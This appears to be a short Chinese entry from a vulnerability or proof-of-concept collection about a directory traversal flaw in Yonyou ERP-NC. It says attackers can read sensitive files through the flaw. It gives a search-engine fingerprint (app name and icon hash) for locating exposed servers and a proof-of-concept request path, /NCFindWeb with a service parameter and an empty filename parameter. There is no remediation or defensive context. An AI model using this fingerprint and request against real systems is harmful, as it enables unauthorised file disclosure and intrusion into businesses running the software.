Appearance
用友 ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。
用友 ERP-NC
app="用友-UFIDA-NC" # or icon_hash="1085941792"
poc
/NCFindWeb?service=IPreAlertConfigService&filename=